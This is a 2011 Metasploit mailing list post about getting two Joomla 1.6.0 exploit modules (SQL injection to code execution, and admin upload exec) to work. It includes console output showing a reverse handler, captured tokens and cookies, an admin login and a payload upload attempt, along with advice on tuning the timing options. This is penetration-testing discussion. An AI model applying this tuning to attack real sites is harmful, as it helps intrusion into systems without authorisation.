Metasploit mailing list archives
Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE)
From: GulfTech Security Research <security () gulftech org>
Date: Fri, 3 Jun 2011 17:30:59 -0400
The proper BMCT value will differ greatly from platform to platform, since server performance directly affects the delay. The only advice I would give is start low and go high as not to choke the mysql daemon. In regards to the admin exec bit, it is really hard to tell from your email as there is no "show options" output etc. given. But, if you set the DBUG option, the http response will be "pp"ed to the console, and should give you the tools you need to self diagnose the problem. Good luck! ~James On Fri, Jun 3, 2011 at 4:39 PM, Jeffs <jeffs () speakeasy net> wrote:
Hello All, Anybody get joomla_filter_order and/or joomla_16_admin_exec to work? I've launched it against a vulnerable 1.6 install of Joomla and get the following (even tried varying BMCT and BMCR as instructed): msf exploit(joomla_filter_order) > exploit [*] Started reverse handler on 192.168.1.108:4444 [*] Initializing exploit code ... ################################################ # Joomla! 1.6.0 SQL Injection -> PHP execution # ################################################ # By James Bercegay # http://www.gulftech.org/ # ################################################ [*] Attempting to determine Joomla version [*] The target is running Joomla version : 1.6 [*] Host appears vulnerable! [*] Got database table prefix : jos_ [*] Calculating target response times [*] Benchmarking 1 normal requests [*] Normal request avg: 0 seconds [*] Benchmarking 1 delayed requests [*] Delayed request avg: 1 seconds [-] Either your benchmark threshold is too small, or host is not vulnerable [-] To increase the benchmark threshold adjust the value of the BMDF option [-] To increase the expression iterator adjust the value of the BMCT option [*] Exploit completed, but no session was created. msf exploit(joomla_filter_order) > msf exploit(joomla_16_admin_exec) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.108:4444 [*] Attempting to extract a valid request token [*] Got token: 5546d400d2ac74f8bcc6f23ea1eec261 [*] Got Cookie: 114a3fcff61e5bebf5463b377d1563a3 => e146646fc1c90611ba2117118785823c [*] Attempting to login as: admin [*] Successfully logged in as: admin [*] Attempting to extract refreshed request token [*] Got token: 44e14542b6a247c4281e7004dff16397 [*] Attempting to upload payload wrapper component [*] Exploit completed, but no session was created. msf exploit(joomla_16_admin_exec) > _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) YGN Ethical Hacker Group (May 28)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (May 29)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) HD Moore (May 29)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) GulfTech Security Research (May 31)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) YGN Ethical Hacker Group (Jun 02)
- joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (Jun 03)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) GulfTech Security Research (Jun 03)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (May 29)